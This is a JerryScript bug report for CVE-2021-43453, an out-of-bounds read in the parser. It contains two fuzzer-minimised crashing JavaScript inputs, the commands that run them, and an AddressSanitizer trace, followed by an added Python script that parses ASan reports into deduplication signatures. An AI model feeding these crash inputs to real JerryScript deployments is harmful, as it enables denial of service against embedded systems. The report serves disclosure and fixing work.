CVE-2021-43453: Heap-overflow on an ill-formed JS program · Issue #4754 · jerryscript-project/jerryscript

A Heap-based Buffer Overflow vulnerability exists in JerryScript 2.4.0 and prior versions via an out-of-bounds read in parser_parse_for_statement_start in the js-parser-statm.c file. This issue is similar to CVE-2020-29657.


JerryScript revision

$ jerry --version
Version: 3.0.0 (5a69b183)

Build platform

$ echo "$(lsb_release -ds) ($(uname -mrs))"
Ubuntu 20.04.1 LTS (Linux 4.15.0-142-generic x86_64)

Build steps

Test case

There are two test cases, where jerry_poc_crash.js can trigger a direct crash of the clean-built jerry and jerry_poc_asan.js can trigger a heap-overflow of the ASAN-enabled-built jerry.

This bug was found by a naive fuzzer, and I used afl-tmin to reduce the test cases. I sincerely apologize for the struggle they cause.

  • jerry_poc_crash.js

R=function(){({0:0}) function x(){for(v in 0){function o(){}function x(){for(;;)for(function(){class A extends function(){for(let;;){((function(){}))}0=function(){} class e

  • jerry_poc_asan.js

R = function() { function x(){ function y(){ for(;;) for(function(){ class A extends function() { for(let;;) { ((function(){})) }

Execution steps

$ ~/release/jerryscript/build/bin/jerry jerry_poc_crash.js
Segmentation fault (core dumped)

$ ~/asan/jerryscript/build/bin/jerry jerry_poc_asan.js
==38036==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x612000005692 at pc 0x55555566952c bp 0x7fffffff9020 sp 0x7fffffff9010
READ of size 1 at 0x612000005692 thread T0
    #0 0x55555566952b (/home/docker/asan/jerryscript/build/bin/jerry+0x11552b)
    #1 0x55555566a84e (/home/docker/asan/jerryscript/build/bin/jerry+0x11684e)
    #2 0x555555589aa2 (/home/docker/asan/jerryscript/build/bin/jerry+0x35aa2)
    #3 0x55555579d5c9 (/home/docker/asan/jerryscript/build/bin/jerry+0x2495c9)
    #4 0x5555555dead1 (/home/docker/asan/jerryscript/build/bin/jerry+0x8aad1)
    #5 0x555555633868 (/home/docker/asan/jerryscript/build/bin/jerry+0xdf868)
    #6 0x5555555c6462 (/home/docker/asan/jerryscript/build/bin/jerry+0x72462)
    #7 0x5555557c2c8e (/home/docker/asan/jerryscript/build/bin/jerry+0x26ec8e)
    #8 0x5555555f4ea1 (/home/docker/asan/jerryscript/build/bin/jerry+0xa0ea1)
    #9 0x5555555f6d8e (/home/docker/asan/jerryscript/build/bin/jerry+0xa2d8e)
    #10 0x5555556188ae (/home/docker/asan/jerryscript/build/bin/jerry+0xc48ae)
    #11 0x55555562451a (/home/docker/asan/jerryscript/build/bin/jerry+0xd051a)
    #12 0x55555563e211 (/home/docker/asan/jerryscript/build/bin/jerry+0xea211)
    #13 0x5555555c1f67 (/home/docker/asan/jerryscript/build/bin/jerry+0x6df67)
    #14 0x5555557c2c8e (/home/docker/asan/jerryscript/build/bin/jerry+0x26ec8e)
    #15 0x5555555f4ea1 (/home/docker/asan/jerryscript/build/bin/jerry+0xa0ea1)
    #16 0x5555555f6d8e (/home/docker/asan/jerryscript/build/bin/jerry+0xa2d8e)
    #17 0x5555556188ae (/home/docker/asan/jerryscript/build/bin/jerry+0xc48ae)
    #18 0x55555562451a (/home/docker/asan/jerryscript/build/bin/jerry+0xd051a)
    #19 0x555555625454 (/home/docker/asan/jerryscript/build/bin/jerry+0xd1454)
    #20 0x555555634129 (/home/docker/asan/jerryscript/build/bin/jerry+0xe0129)
    #21 0x5555555c6462 (/home/docker/asan/jerryscript/build/bin/jerry+0x72462)
    #22 0x5555557c2c8e (/home/docker/asan/jerryscript/build/bin/jerry+0x26ec8e)
    #23 0x55555560b8c8 (/home/docker/asan/jerryscript/build/bin/jerry+0xb78c8)
    #24 0x5555555c61c2 (/home/docker/asan/jerryscript/build/bin/jerry+0x721c2)
    #25 0x5555557c2c8e (/home/docker/asan/jerryscript/build/bin/jerry+0x26ec8e)
    #26 0x55555560b8c8 (/home/docker/asan/jerryscript/build/bin/jerry+0xb78c8)
    #27 0x5555555c61c2 (/home/docker/asan/jerryscript/build/bin/jerry+0x721c2)
    #28 0x5555557c2c8e (/home/docker/asan/jerryscript/build/bin/jerry+0x26ec8e)
    #29 0x5555555f4ea1 (/home/docker/asan/jerryscript/build/bin/jerry+0xa0ea1)
    #30 0x5555555f6d8e (/home/docker/asan/jerryscript/build/bin/jerry+0xa2d8e)
    #31 0x5555556188ae (/home/docker/asan/jerryscript/build/bin/jerry+0xc48ae)
    #32 0x55555562451a (/home/docker/asan/jerryscript/build/bin/jerry+0xd051a)
    #33 0x5555555ca181 (/home/docker/asan/jerryscript/build/bin/jerry+0x76181)
    #34 0x5555557c982d (/home/docker/asan/jerryscript/build/bin/jerry+0x27582d)
    #35 0x55555592b342 (/home/docker/asan/jerryscript/build/bin/jerry+0x3d7342)
    #36 0x5555555718c9 (/home/docker/asan/jerryscript/build/bin/jerry+0x1d8c9)
    #37 0x7ffff73ba0b2 (/lib/x86_64-linux-gnu/libc.so.6+0x270b2)
    #38 0x555555580add (/home/docker/asan/jerryscript/build/bin/jerry+0x2cadd)

Address 0x612000005692 is a wild pointer.
SUMMARY: AddressSanitizer: heap-buffer-overflow (/home/docker/asan/jerryscript/build/bin/jerry+0x11552b)
Shadow bytes around the buggy address:
  0x0c247fff8a80: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c247fff8a90: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c247fff8aa0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c247fff8ab0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c247fff8ac0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
=>0x0c247fff8ad0: fa fa[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c247fff8ae0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c247fff8af0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c247fff8b00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c247fff8b10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c247fff8b20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
  Shadow gap:              cc
==38036==ABORTING
Aborted
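The AddressSanitizer report above is the kind of output a fuzzing campaign produces by the hundreds, and the useful defender-side step is to turn each one into a structured record with a stable deduplication key. The following Python is an added triage example, not code from the issue or from the JerryScript project: it parses the report header, the access line, the frame list and the "wild pointer" note, then builds a crash signature from module-relative offsets (which survive ASLR between runs) rather than absolute program counters. The embedded report is a constructed, abbreviated copy of the one shown in the issue (same pid, addresses and offsets; most frames omitted).

```python
import hashlib
import re

# Constructed sample: an abbreviated copy of the ASan report shape printed
# in the issue above. Only four of the 39 frames are kept for brevity.
SAMPLE_REPORT = """\
==38036==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x612000005692 at pc 0x55555566952c bp 0x7fffffff9020 sp 0x7fffffff9010
READ of size 1 at 0x612000005692 thread T0
    #0 0x55555566952b (/home/docker/asan/jerryscript/build/bin/jerry+0x11552b)
    #1 0x55555566a84e (/home/docker/asan/jerryscript/build/bin/jerry+0x11684e)
    #2 0x555555589aa2 (/home/docker/asan/jerryscript/build/bin/jerry+0x35aa2)
    #37 0x7ffff73ba0b2 (/lib/x86_64-linux-gnu/libc.so.6+0x270b2)

Address 0x612000005692 is a wild pointer.
SUMMARY: AddressSanitizer: heap-buffer-overflow (/home/docker/asan/jerryscript/build/bin/jerry+0x11552b)
"""

# Patterns for the three report lines we care about. Frames without symbols
# (as in the issue, where the binary was built without debug info) still carry
# "module+offset", which is enough for deduplication.
HEADER_RE = re.compile(
    r"==(\d+)==ERROR: AddressSanitizer: (\S+) on address (0x[0-9a-f]+)")
ACCESS_RE = re.compile(r"^(READ|WRITE) of size (\d+) at (0x[0-9a-f]+)", re.M)
FRAME_RE = re.compile(
    r"^\s*#(\d+) (0x[0-9a-f]+) \((.+?)\+(0x[0-9a-f]+)\)", re.M)


def parse_asan_report(text):
    """Extract bug type, faulting access, and the frame list from ASan output."""
    header = HEADER_RE.search(text)
    if header is None:
        raise ValueError("not an AddressSanitizer error report")
    pid, bug_type, address = header.groups()
    access = ACCESS_RE.search(text)
    frames = [
        {"n": int(n), "pc": pc, "module": module, "offset": offset}
        for n, pc, module, offset in FRAME_RE.findall(text)
    ]
    return {
        "pid": int(pid),
        "bug_type": bug_type,
        "address": address,
        "access": access.group(1) if access else None,
        "size": int(access.group(2)) if access else None,
        # ASan says this when the address is outside any known allocation,
        # i.e. the read went well past the buffer rather than one byte over.
        "wild_pointer": "is a wild pointer" in text,
        "frames": frames,
    }


def crash_signature(report, depth=5, ignore_modules=("libc.so.6",)):
    """Dedup key: bug type, access kind and the top `depth` module+offset pairs.

    Absolute pcs change with ASLR, so only the module-relative offsets are
    hashed. libc frames are skipped so the key reflects the crashing program.
    """
    parts = []
    for frame in report["frames"]:
        basename = frame["module"].rsplit("/", 1)[-1]
        if basename in ignore_modules:
            continue
        parts.append(f"{basename}+{frame['offset']}")
        if len(parts) == depth:
            break
    key = "|".join([report["bug_type"], report["access"] or "?", *parts])
    return hashlib.sha256(key.encode()).hexdigest()[:16]


def triage(text):
    """Parse one report and attach its signature; this is the record a
    fuzzing pipeline would store per crash file."""
    report = parse_asan_report(text)
    report["signature"] = crash_signature(report)
    return report


if __name__ == "__main__":
    record = triage(SAMPLE_REPORT)
    print(f"{record['bug_type']} {record['access']} size={record['size']} "
          f"wild={record['wild_pointer']} sig={record['signature']}")
    for frame in record["frames"][:3]:
        print(f"  #{frame['n']} {frame['module'].rsplit('/', 1)[-1]}+{frame['offset']}")
```

Running the block prints one line per report plus the top three frames; two reports from the same bug under different address-space layouts hash to the same signature, while a different top-of-stack or a WRITE instead of a READ yields a new one.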

Output

See above.

Backtrace

See above.

Expected behavior

Not to crash
